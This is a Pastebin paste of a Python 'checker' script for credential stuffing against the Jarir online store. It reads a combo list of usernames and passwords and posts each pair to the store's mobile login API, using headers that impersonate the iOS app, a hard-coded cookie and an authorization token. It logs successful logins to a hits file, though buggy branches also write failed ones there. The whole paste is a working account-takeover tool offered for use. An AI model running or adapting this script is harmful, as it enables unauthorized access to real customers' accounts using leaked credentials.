Advertisement
6g7r

Jarir Checker

May 20th, 2021
731
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.35 KB | None | 0 0
  1. import os
  2. try:
  3. import requests
  4.  
  5. bad = 0
  6. err = 0
  7. good = 0
  8. errc = 0
  9. except:
  10. print("You Want Install requests")
  11. os.system("pip install requests")
  12. from time import sleep
  13. print("""
  14. ▒▒▒▒▒▐▀▀▀█▄▒▒▒▒▒▒▒▒▒
  15. ▒▒▒▒█▀─────█▒▒▒▒▒▒▒▒
  16. ▒▒▒█────▄─▄─▌▒▒▒▒▒▒▒
  17. ▒▒▒▌───██─█▌▌▒▒▒▒▒▒▒
  18. ▒▒▒▌───█▌──▌▌▒▒▒▒▒▒▒
  19. ▒▒▒▌────────▌▒▒▒▒▒▒▒
  20. ▒▒█─────────▐▒▒▒▒▒▒▒
  21. ▒▐▌─▐───────▐▄▄▒▒▒▒▒
  22. ▒▐▌─▐────────▄▀▀█▒▒▒
  23. ▒█──▀▄──▄█▄▀▀▒▒▒▌▀▄▒
  24. ▐▌────██▀█░█▄▒▄▄█▀▀▌
  25. ▐▌──▌▐───▐░░▐▀░░░░░▌
  26. ▐▌──▌────▐░░▐░░░░░░▌
  27. ▐───▌────▐░░▐░░░░░░▌
  28. ▐───█────▐░░▐░░░░░░▌
  29. ▐───█────▐░░▐░░░░░░▌
  30. ▐───█─────▀█▐▄▄▄█▀▀▒
  31. ▀▄▄─▐───────▄█▒▒▒▒▒▒
  32. ▒▒▒▀█───█▄▀▀▀▒▒▒▒▒▒▒
  33. ▒▒▒▒▒▀▀▀▒▒▒▒▒▒▒▒▒▒▒▒
  34.  
  35. ▄▀▀▄ ░█▀▀█ ▀▀▀█ ░█▀▀█
  36. █▄▄─ ░█─▄▄ ──█─ ░█▄▄▀
  37. ▀▄▄▀ ░█▄▄█ ─▐▌─ ░█─░█
  38.  
  39. ▄▀█ █▄░█ █▀▄
  40. █▀█ █░▀█ █▄▀
  41.  
  42. █▀ █░█ █▄█ █▄▄ █▀█ █▄░█ █▀▀ █▀█ █▀█ █▀█ █▀█
  43. ▄█ █▀█ ░█░ █▄█ █▄█ █░▀█ ██▄ █▀▄ █▀▄ █▄█ █▀▄
  44. """)
  45. fi = input("combo :")
  46. print()
  47. print()
  48. print()
  49. file= open(fi).read().splitlines()
  50. for file in file:
  51. c = open(fi, 'r').read().splitlines()
  52. for meow in c:
  53. split = meow.split(':')
  54. user = split[0]
  55. password = split[1]
  56. url= "https://www.jarir.com/mobileapi/customer/login"
  57. head= {
  58.  
  59. "Host":"www.jarir.com",
  60. "Content-Type":"application/x-www-form-urlencoded",
  61. "Accept":"*/*",
  62. "Cookie":"frontend=pfkvnvc104qj81m55hv8khb147",
  63. "Connection":"keep-alive",
  64. "Content-Length":"45",
  65. "User-Agent":"Mobile - App - Jarir iOS App - 6.2.5 - iOS14.5.1 - Apple - iPhone8,4",
  66. "Accept-Language": "ar-SA;q=1.0",
  67. "Authorization":"Jarir:ypy/tYfKqX/bTIjLAh9jJuonp3AUHA4reKUWfJ+16Ig=",
  68. "Accept-Encoding":"br;q=1.0, gzip;q=0.9, deflate;q=0.8"
  69.  
  70. }
  71. data= {
  72. "password":password,
  73. "username":user
  74.  
  75. }
  76. sleep(3)
  77. login = requests.post(url,headers=head,json=data)
  78. if login.status_code == 429:
  79. err +=1
  80. elif login.json()['message'] == "تسجيل دخول أو رقم سري غير صالح":
  81. bad +=1
  82. with open("Hits-jarir.txt",'a') as hits:
  83. hits.write(f"{user}:{password}\n")
  84. else:
  85. good +=1
  86. with open("Hits-jarir.txt",'a') as hits:
  87. hits.write(f"{user}:{password}\n")
  88. # bad +=1
  89. print(f"\r Hits [{good}] Bad [{bad}] {errc}Error [{err}]",end="")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement